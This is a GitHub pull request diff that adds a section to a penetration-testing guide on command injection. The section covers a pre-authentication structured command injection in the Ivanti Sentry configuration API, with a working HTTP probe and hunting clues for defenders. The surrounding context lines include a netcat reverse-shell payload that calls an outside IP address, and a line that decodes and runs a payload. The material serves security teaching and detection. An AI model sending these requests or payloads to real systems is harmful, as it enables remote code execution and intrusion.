Skip to content

CVE-2026-10520 and CVE-2026-10523 Multiple Critical Vulnerab... #2356

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
+51 −0
Open

CVE-2026-10520 and CVE-2026-10523 Multiple Critical Vulnerab... #2356

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
51 changes: 51 additions & 0 deletions src/pentesting-web/command-injection.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -67,6 +67,54 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```

### Structured configuration-command injection in appliance APIs (Ivanti Sentry)

Some appliance management planes do **not** pass attacker input straight into `/bin/sh`. Instead, they expose an HTTP endpoint that accepts what looks like a normal form field, but the backend parses it as a **trusted internal configuration command**.

**Pattern seen in Ivanti Sentry:**

- Unauthenticated POST endpoint: `/mics/api/v2/sentry/mics-config/handleMessage`
- User-controlled form field: `message`
- Backend tokenizes `message` into an internal verb / module / XPath / XML body
- The `execute system /configuration/system/commandexec` path reaches the native command-execution feature
- The command itself lives inside the XML-like `reqandres` field, so this is **structured command injection**, not just `;id`-style shell metacharacter abuse

Minimal probe:

```http
POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E
```

Decoded shape:

```
message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>
```

What makes this interesting during review:

1. **Verb-based dispatch**: user input is split into tokens such as `execute`, `system`, and an internal configuration path.
2. **Structured body parsing**: the trailing data is parsed as XML/config rather than treated as a plain argument.
3. **Privileged backend bridge**: the request reaches native/admin functionality intended for trusted internal workflows.
4. **No classic metacharacters required**: if filters only block `;`, `&&`, `|`, or `$()`, the bug still works because the payload is syntactically valid for the appliance's own parser.

Testing ideas for similar products:

- Enumerate **unauthenticated or weakly protected management/config endpoints** that accept verbs, config paths, XML fragments, or CLI-like mini languages.
- Diff patched builds for hardcoded replacement payloads or newly blocked paths; they often reveal the exact internal command grammar.
- Try legitimate-looking verbs such as `execute`, `test`, `import`, `query`, `apply`, `run`, or `diagnose` instead of shell separators.
- If the response returns structured XML/JSON, check whether your command output is embedded inside success fields rather than echoed raw.

Hunting clues:

- POSTs to `/mics/api/v2/sentry/mics-config/handleMessage`
- `Content-Type: application/x-www-form-urlencoded` with `message=`
- Tokens such as `execute system`, `/configuration/system/commandexec`, `<commandexec>`, `<reqandres>`

### Bash arithmetic evaluation in RewriteMap/CGI-style scripts

RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute.
Expand Down Expand Up @@ -287,5 +335,8 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
- [Rapid7 – CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry](https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry)
- [watchTowr Labs – Ivanti Sentry Pre-Auth OS Command Injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/)
- [Ivanti advisory – Ivanti Sentry (CVE-2026-10520 / CVE-2026-10523)](https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US)

{{#include ../banners/hacktricks-training.md}}